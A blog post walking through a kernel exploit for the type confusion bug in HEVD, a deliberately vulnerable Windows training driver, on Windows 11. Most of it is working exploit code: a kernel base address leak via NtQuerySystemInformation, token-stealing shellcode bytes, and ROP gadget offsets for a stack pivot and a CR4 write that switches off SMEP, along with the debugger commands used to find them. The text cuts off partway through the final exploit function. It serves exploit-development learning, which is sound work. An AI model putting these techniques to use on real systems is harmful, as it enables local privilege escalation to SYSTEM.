
6 August 2023 at 13:10

How did a simple K-TypeConfusion take me 3 months to exploit? [HEVD] - Windows 11 (build 22621)

Have you ever worked on something for so long that it became part of your life? That's what happened to me over the last few months, when a simple TypeConfusion vulnerability almost drove me crazy!

Introduction

In this blog post, I will talk about my experience with a simple vulnerability that, for some reason, was the hardest and most confusing thing I have ever seen in the context of kernel exploitation.

We will cover the following topics:

  • TypeConfusion: We will discuss how this vulnerability impacts the Windows kernel, and how, as researchers, we can manipulate it and implement an exploit from User-Land in order to gain privileged access on the operating system.
  • ROP chain: A method for making the RIP register jump through Windows kernel addresses in order to execute code. With this technique, we can manipulate the execution order of our stack and eventually reach our User-Land shellcode.
  • Kernel ASLR Bypass: A way to leak kernel memory addresses; with the correct base address, we are able to calculate the memory regions we want to use later.
  • Supervisor Mode Execution Prevention (SMEP): A mechanism that blocks kernel execution of user-land addresses. If it is enabled in the operating system, you can't JMP/CALL into User-Land, so you can't simply execute your shellcode directly. This protection has shipped since Windows 8.0 (32/64 bits).
  • Kernel Memory Management: Important information about how the kernel interprets memory, including memory paging, segmentation, data transfer, etc., plus a description of how memory is laid out and used by the operating system.
  • Stack Manipulation: The stack is the most notorious thing you will see in this blog post; all of my research revolves around it, and after rebooting my VM a million times, I can finally understand a few of the concepts you must consider when writing a stack-based exploit.

VM Setup

OS Name:                   Microsoft Windows 11 Pro
OS Version: 10.0.22621 N/A Build 22621
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Vulnerable Driver: HackSysExtremeVulnerableDriver a.k.a HEVD.sys

Tips for Kernel Exploitation coding

Default Windows functions can often slow down exploit development, because many of them come with "protected values" meant to prevent misuse by attackers or by anyone who wants to modify/manipulate internal values. In many C/C++ sources, you can find an include such as the following:

#include <windows.h>
#include <winternl.h> // Don't use it
#include <iostream>
#pragma comment(lib, "ntdll.lib")
<...snip...>

When winternl.h is included, the default definitions of numerous functions are overridden by the values defined in the structs of that header.

// https://github.com/wine-mirror/wine/blob/master/include/winternl.h#L1790C1-L1798C33
// snippet from wine/include/winternl.h
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemCpuInformation = 1,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3, /* was SystemTimeInformation */
SystemPathInformation = 4,
SystemProcessInformation = 5,
SystemCallCountInformation = 6,
SystemDeviceInformation = 7,
<...snip...>

The problem is that when you work with and exploit User-Land functions like NtQuerySystemInformation on "recent" Windows versions, these definitions are "different", blocking the use of the very functions that can leak kernel base addresses and consequently delaying our exploitation phase. So it is important to craft the code without winternl.h, and instead use manual struct definitions, as in the example below:

#include <iostream>
#include <windows.h>
#include <ntstatus.h>
#include <string>
#include <Psapi.h>
#include <vector>

#define QWORD uint64_t

typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemModuleInformation = 11,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG NumberOfModules;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);

// Function pointer typedef for NtDeviceIoControlFile
typedef NTSTATUS(WINAPI* LPFN_NtDeviceIoControlFile)(
HANDLE FileHandle,
HANDLE Event,
PVOID ApcRoutine,
PVOID ApcContext,
PVOID IoStatusBlock,
ULONG IoControlCode,
PVOID InputBuffer,
ULONG InputBufferLength,
PVOID OutputBuffer,
ULONG OutputBufferLength
);

// Loads NTDLL library
HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile function
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));

INT64 GetKernelBase() {
// Leak the ntoskrnl.exe base address in order to bypass KASLR
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}

With this technique, now we’re able to use all correct structsvalues without any troubles.

TypeConfusion vulnerability

Using the IDA reverse engineering tool, we can clearly see the correct IOCTL that executes our vulnerable function.

0x222023 is the IOCTL that executes our TypeConfusionIoctlHandler

After reversing TriggerTypeConfusion, we have the following code:

// IDA Pseudo-code into TriggerTypeConfusion function
__int64 __fastcall TriggerTypeConfusion(_USER_TYPE_CONFUSION_OBJECT *a1)
{
_KERNEL_TYPE_CONFUSION_OBJECT *PoolWithTag; // r14
unsigned int v4; // ebx
ProbeForRead(a1, 0x10ui64, 1u);
PoolWithTag = (_KERNEL_TYPE_CONFUSION_OBJECT *)ExAllocatePoolWithTag(NonPagedPool, 0x10ui64, 0x6B636148u);
if ( PoolWithTag )
{
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Type: %s\n", "NonPagedPool");
DbgPrintEx(0x4Du, 3u, "[+] Pool Size: 0x%X\n", 16i64);
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] UserTypeConfusionObject: 0x%p\n", a1);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject Size: 0x%X\n", 16i64);
PoolWithTag->ObjectID = a1->ObjectID; // USER_CONTROLLED PARAMETER
PoolWithTag->ObjectType = a1->ObjectType; // USER_CONTROLLED PARAMETER
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectID: 0x%p\n", (const void *)PoolWithTag->ObjectID);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectType: 0x%p\n", PoolWithTag->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Triggering Type Confusion\n");
v4 = TypeConfusionObjectInitializer(PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] Freeing KernelTypeConfusionObject Object\n");
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
ExFreePoolWithTag(PoolWithTag, 0x6B636148u);
return v4;
}
else
{
DbgPrintEx(0x4Du, 3u, "[-] Unable to allocate Pool chunk\n");
return 3221225495i64;
}
}

As you can see, the function expects two values from a user-controlled struct (_USER_TYPE_CONFUSION_OBJECT) containing ObjectID and ObjectType as fields; after copying these fields into a freshly allocated _KERNEL_TYPE_CONFUSION_OBJECT, it calls TypeConfusionObjectInitializer with that kernel object. The vulnerable code follows below:

__int64 __fastcall TypeConfusionObjectInitializer(_KERNEL_TYPE_CONFUSION_OBJECT *KernelTypeConfusionObject)
{
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->Callback: 0x%p\n", KernelTypeConfusionObject->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Calling Callback\n");
((void (*)(void))KernelTypeConfusionObject->ObjectType)(); // VULNERABLE
DbgPrintEx(0x4Du, 3u, "[+] Kernel Type Confusion Object Initialized\n");
return 0i64;
}

The vulnerability in the code above is hidden in the unrestricted execution of _KERNEL_TYPE_CONFUSION_OBJECT->ObjectType, which points to a user-controlled address.
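
To make the confusion easier to visualize, the two structures involved look roughly like this (paraphrased from the HEVD sources, with simplified types): the user-mode object carries a plain ObjectType value, while the kernel object overlays ObjectType with a Callback function pointer inside a union, so whatever 8-byte value we supply from user land ends up being treated as code to call.

// Paraphrased/simplified from the HEVD sources: the union is what makes the bug possible
typedef struct _USER_TYPE_CONFUSION_OBJECT {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;         // plain integer coming from user land
} USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;

typedef void (*FunctionPointer)(void);

typedef struct _KERNEL_TYPE_CONFUSION_OBJECT {
    ULONG_PTR ObjectID;
    union {
        ULONG_PTR ObjectType;
        FunctionPointer Callback; // same 8 bytes, now interpreted as a function pointer
    };
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;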

Exploit Initialization

Now that we understand the vulnerability, let's focus on the exploit phases.

First of all, we craft our code to communicate with the HEVD driver by sending an IRP with the previously obtained IOCTL (0x222023), and then we deliver our malicious buffer.

<...snip...>
// ---> Malicious Struct <---
struct USER_CONTROLLED_OBJECT {
INT64 ObjectID;
INT64 ObjectType;
};

HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));

HANDLE setupSocket() {
// Open a handle to the target device
HANDLE deviceHandle = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
nullptr,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
nullptr
);
if (deviceHandle == INVALID_HANDLE_VALUE) {
//std::cout << "[-] Failed to open the device" << std::endl;
FreeLibrary(ntdll);
return FALSE;
}
return deviceHandle;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = 0xDEADBEEFDEADBEEF; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}

int main() {
exploit();
return 0;
}

After we send our buffer, the _KERNEL_TYPE_CONFUSION_OBJECT should look like this:

The 0xdeadbeefdeadbeef address is our callback for the moment
[CALL]ing 0xdeadbeefdeadbeef

Now we can clearly see where exactly this vulnerability lies. The next step would be to JMP into a user-controlled buffer containing shellcode that escalates us to SYSTEM privileges; the problem with this idea is a protection mechanism called Supervisor Mode Execution Prevention, a.k.a. SMEP.

Supervisor Mode Execution Prevention (SMEP)

The main idea behind the SMEP protection is to prevent the kernel from CALLing/JMPing into user-land addresses. If the SMEP kernel bit is set to [1], it provides a security mechanism that protects memory pages from user-mode attacks.

According to Core Security,

SMEP: Supervisor Mode Execution Prevention allows pages to be protected from supervisor-mode instruction fetches. If SMEP = 1, software operating in supervisor mode cannot fetch instructions from linear addresses that are accessible in user mode.
- Detects RING-0 code running in USER SPACE
- Introduced at Intel processors based on the Ivy Bridge architecture
- Security feature launched in 2011
- Enabled by default since Windows 8.0 (32/64 bits)
- Kernel exploit mitigation
- Specially "Local Privilege Escalation" exploits must now consider this feature.

Then let’s see in a pratical test if it is actually working properly.

<...snip...>
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)shellcode; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>

After running the exploit we get something like this:

SMEP seems to be working properly

The BugCheck analysis should look similar to the following:

ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)
An attempt was made to execute non-executable memory. The guilty driver
is on the stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name is printed on
the BugCheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: 0000000080000000, Virtual address for the attempted execute.
Arg2: 00000001db4ea867, PTE contents.
Arg3: ffffb40672892490, (reserved)
Arg4: 0000000080000005, (reserved)
<...snip...>

As we can see, SMEP protection is working as intended. The following steps cover how we can manipulate our addresses so that the processor is allowed to execute our shellcode buffer.

Return-Oriented Programming against SMEP

Return-Oriented Programming, a.k.a. ROP, is a technique that allows an attacker to manipulate the instruction pointer and the return addresses on the current stack. With this type of attack, we can effectively "program" in assembly using only snippets that execution hops between, address to address.

As CTF101 mentioned:

Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.
As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwrite saved instruction pointers, giving us control over what the program does next. Most programs don't have a convenient give_shell function however, so we need to find a way to manually invoke system or another exec function to get us our shell.

The main idea for our exploit is to use a ROP chain in order to achieve arbitrary code execution. But how?

x64 CR4 register

As one of the control registers, CR4 holds a set of bit flags whose values can differ between operating systems.

When SMEP is implemented, a bit in CR4 tells the current OS whether SMEP is enabled, and from that bit the kernel knows whether, during its execution, it is allowed to CALL/JMP into user-land addresses.

As Wikipedia says:

A control register is a processor register that changes or controls the general behavior of a CPU or other digital device. Common tasks performed by control registers include interrupt control, switching the addressing mode, paging control, and coprocessor control.
CR4
Used in protected mode to control operations such as virtual-8086 support, enabling I/O breakpoints, page size extension and machine-check exceptions.

On my operating system build, Windows 11 22621, we can clearly see this register's value in WinDBG:

CR4 value before the ROP chain

For now, the main idea is to flip the correct bit in order to neutralize SMEP, and after that JMP into the attacker's shellcode.

SMEP turning off through bit flip: 001[1]0101 -> 001[0]0101
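
In code, that flip is simply clearing bit 20 of the value currently held in CR4. A small sketch (the 0x3506f8 value is the one read from WinDBG on this particular VM and used later in the exploit; it will differ on other machines):

#include <cstdint>
// Sketch: compute the SMEP-less CR4 value that the ROP chain will load
constexpr uint64_t CR4_SMEP_BIT = 1ULL << 20;            // bit 20 of CR4 enables SMEP
const uint64_t currentCr4 = 0x3506f8;                    // value read with WinDBG on this VM
const uint64_t patchedCr4 = currentCr4 & ~CR4_SMEP_BIT;  // 0x3506f8 -> 0x2506f8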

Now, with this in mind, we need to get back to our exploit source code and craft our ROP chain to achieve this goal. The question is, how?

So far we know that we need to change the CR4 value and that a ROP chain can help us, but we also first need to bypass Kernel ASLR because of the address randomization in kernel land. The next steps cover how to get the correct gadgets for the attacks that follow.

Virtualization-based security (VBS)

When manipulating the CR4 register through a ROP chain, it is important to note that if the attacker miscalculates the value during the bit-change phase, or if the Virtualization-based Security feature is enabled, the system catches the exception and crashes after the attempt to change the CR4 register value.

According to Microsoft:

Virtualization-based security (VBS) enhancements provide another layer of protection against attempts to execute malicious code in the kernel. For example, Device Guard blocks code execution in a non-signed area in kernel memory, including kernel EoP code. Enhancements in Device Guard also protect key MSRs, control registers, and descriptor table registers. Unauthorized modifications of the CR4 control register bitfields, including the SMEP field, are blocked instantly.

If for some reason you see an error like the one below, it is probably a miscalculation of the value that should be placed into the CR4 register.

<...snip...>
// A example of miscalculation of CR4 address
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0xFFFFFF; // ---> WRONG CR4 value
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>

WinDBG output:

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000004, The thread's stack pointer was outside the legal stack
extents for the thread.

Arg2: 0000000047fff230, Address of the trap frame for the exception that caused the BugCheck
Arg3: 0000000047fff188, Address of the exception record for the exception that caused the BugCheck
Arg4: 0000000000000000, Reserved
EXCEPTION_RECORD: 0000000047fff188 -- (.exr 0x47fff188)
ExceptionAddress: fffff80631091b99 (nt!RtlpGetStackLimitsEx+0x0000000000165f29)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000004
Subcode: 0x4 FAST_FAIL_INCORRECT_STACK
PROCESS_NAME: TypeConfusionWin11x64.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system has detected a stack-based buffer overrun in this application. It is possible that this saturation could allow a malicious user to gain control of the application.
EXCEPTION_CODE_STR: c0000409
EXCEPTION_PARAMETER1: 0000000000000004
EXCEPTION_STR: 0xc0000409

KASLR Bypass with NtQuerySystemInformation

As mentioned before, NtQuerySystemInformation is a function that, if used correctly, can leak kernel module base addresses by performing system query operations. Through the results of these queries, we can effectively leak kernel addresses from user-land.

As mentioned by Trustwave:

The function NTQuerySystemInformation is implemented on NTDLL. And as a kernel API, it is always being updated during the Windows versions with no short notice. As mentioned, this is a private function, so not officially documented by Microsoft. It has been used since early days from Windows NT-family systems with different syscall IDs.
<...snip...>
The function basically retrieves specific information from the environment and its structure is very simple
<...snip...>
There are numerous data that can be retrieved using these classes along with the function. Information regarding the system, the processes, objects and others.

So now we have a question: if we can leak addresses and calculate the correct offset from the base address to our gadget, how do we actually search memory for those gadgets?

The solution is as simple as follows:

1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt

With the rop.txt file we have addresses, but we are still "unable" to pick the correct ones to build a valid calculation.

Ntdll, for example, sometimes uses addresses within its own module as "buffers", and that data can end up pointing to another, invalid location. At kernel level, functions "change", and between all these "changes" you will never hit the correct offset through a simple .writemem dump.

The biggest issue is that when .writemem is used, it dumps everything between the start and end of a given module, but it does not automatically keep the offsets of functions correctly aligned. This happens because of module segments and malleable data that changes over time as part of normal OS operation. For example, if we search for opcodes using the WinDBG command line, there is a static buffer address that returns exactly the opcodes we send.

WinDBG opcode searching

The addresses above seem to be valid, and they match our opcodes exactly; the problem is that 0xfffff80051ef8500 is a buffer, and it echoes back whatever we put into the WinDBG search function [the s command]. So no matter how you change the opcodes, they always show up again in that buffer.

WinDBG opcode searching

Ok, now let’s say that ROPGadget.py return as the followΒ output:

--> 0xfffff800516a6ac4 : pop r12 ; pop rbx ; pop rbp ; pop rdi ; pop rsi ; ret
0xfffff800514cbd9a : pop r12 ; pop rbx ; pop rbp ; ret
0xfffff800514d2bbf : pop r12 ; pop rbx ; ret
0xfffff800514b2793 : pop r12 ; pop rcx ; ret

If we check whether those opcodes are the same in our current VM, we'll notice something like this:

Inspecting 0xfffff800516a6ac4 address

As you can see, the offset from .writemem is invalid, meaning that something went wrong. A simple fix for this issue is to look at our ROP gadgets, take the assembly code we need, convert it into opcodes, and then search the currently valid memory for those bytes to find the addresses that will start our ROP chain.

4 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
5 - kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
6 - kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
7 - kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0

Now we know that the nt (ntoskrnl.exe) base address 0xfffff80051200000 + 0x00000000002ce4c0 lands on the nt!ExfReleasePushLock+0x20 gadget.

Stack Pivoting & ROP chain

With the previous idea of what exactly a ROP chain is, it's now important to figure out which gadgets we need in order to change the CR4 register value using only kernel addresses.

STACK PIVOTING:
mov esp, 0x48000000

ROP CHAIN:
POP RCX; ret // Just "pop" our RCX register to receive values
<CR4 CALCULATED VALUE> // Calculated value of current OS CR4 value
MOV CR4, RCX; ret // Changes current CR4 value with a manipulated one

// The logic for the ROP chain:
// 1 - Allocate memory in the 0x48000000 region
// 2 - When we move the 0x48000000 address into our ESP/RSP register,
//     we control the fake stack contents and therefore every address we will [CALL/JMP] into.

Now that we know our ROP chain logic, we need to discuss the Stack Pivoting technique.

Stack pivoting basically means swapping the current kernel stack for a user-controlled fake stack, which is possible by changing the RSP register value. Once RSP points to a user-controlled stack, we can drive its execution through a ROP chain, since we can keep returning into kernel addresses of our choosing.

Getting back to the code, we implement our attacker-controlled fake stack.

<...snip...>
struct USER_CONTROLLED_OBJECT {
INT64 ObjectID;
INT64 ObjectType;
};
typedef struct _SMEP {
INT64 STACK_PIVOT;
INT64 POP_RCX;
INT64 MOV_CR4_RCX;
} SMEP;
<...snip...>
// Leak base address utilizing NtQuerySystemInformation
INT64 GetKernelBase() {
DWORD len;
PSYSTEM_MODULE_INFORMATION ModuleInfo;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
ModuleInfo = (PSYSTEM_MODULE_INFORMATION)VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!ModuleInfo) {
return NULL;
}
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
}
SMEP SMEPBypass = { 0 };
int SMEPBypassInitializer() {
INT64 NT_BASE_ADDR = GetKernelBase(); // ntoskrnl.exe
std::cout << std::endl << "[+] NT_BASE_ADDR: 0x" << std::hex << NT_BASE_ADDR << std::endl;
INT64 STACK_PIVOT = NT_BASE_ADDR + 0x002ce4c0;
SMEPBypass.STACK_PIVOT = STACK_PIVOT;
std::cout << "[+] STACK_PIVOT: 0x" << std::hex << STACK_PIVOT << std::endl;
/*
1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ROPgadget.py --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt
*******************************************************************************
kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
kd> u nt!ExfReleasePushLock+0x20
nt!ExfReleasePushLock+0x20:
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0
*/
INT64 POP_RCX = NT_BASE_ADDR + 0x0021d795;
SMEPBypass.POP_RCX = POP_RCX;
std::cout << "[+] POP_RCX: 0x" << std::hex << POP_RCX << std::endl;
/*
kd> s fffff800`51200000 L?01047000 41 5C 59 C3
fffff800`5141d793 41 5c 59 c3 cc b1 02 e8-21 06 06 00 eb c1 cc cc A\Y.....!.......
fffff800`5141f128 41 5c 59 c3 cc cc cc cc-cc cc cc cc cc cc cc cc A\Y.............
fffff800`5155a604 41 5c 59 c3 cc cc cc cc-cc cc cc cc 48 8b c4 48 A\Y.........H..H
kd> u fffff800`5141d795
nt!KeClockInterruptNotify+0x2ff5:
fffff800`5141d795 59 pop rcx
fffff800`5141d796 c3 ret
kd> ? fffff800`5141d795 - fffff800`51200000
Evaluate expression: 2217877 = 00000000`0021d795
*/
INT64 MOV_CR4_RCX = NT_BASE_ADDR + 0x003a5fc7;
SMEPBypass.MOV_CR4_RCX = MOV_CR4_RCX;
std::cout << "[+] MOV_CR4_RCX: 0x" << std::hex << MOV_CR4_RCX << std::endl << std::endl;
/*
kd> u nt!KeFlushCurrentTbImmediately+0x17
nt!KeFlushCurrentTbImmediately+0x17:
fffff800`515a5fc7 0f22e1 mov cr4,rcx
fffff800`515a5fca c3 ret
kd> ? fffff800`515a5fc7 - fffff800`51200000
Evaluate expression: 3825607 = 00000000`003a5fc7
*/
return TRUE;
}
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
ULONG ioctlCode = 0x222023; //HEVD_IOCTL_TYPE_CONFUSION
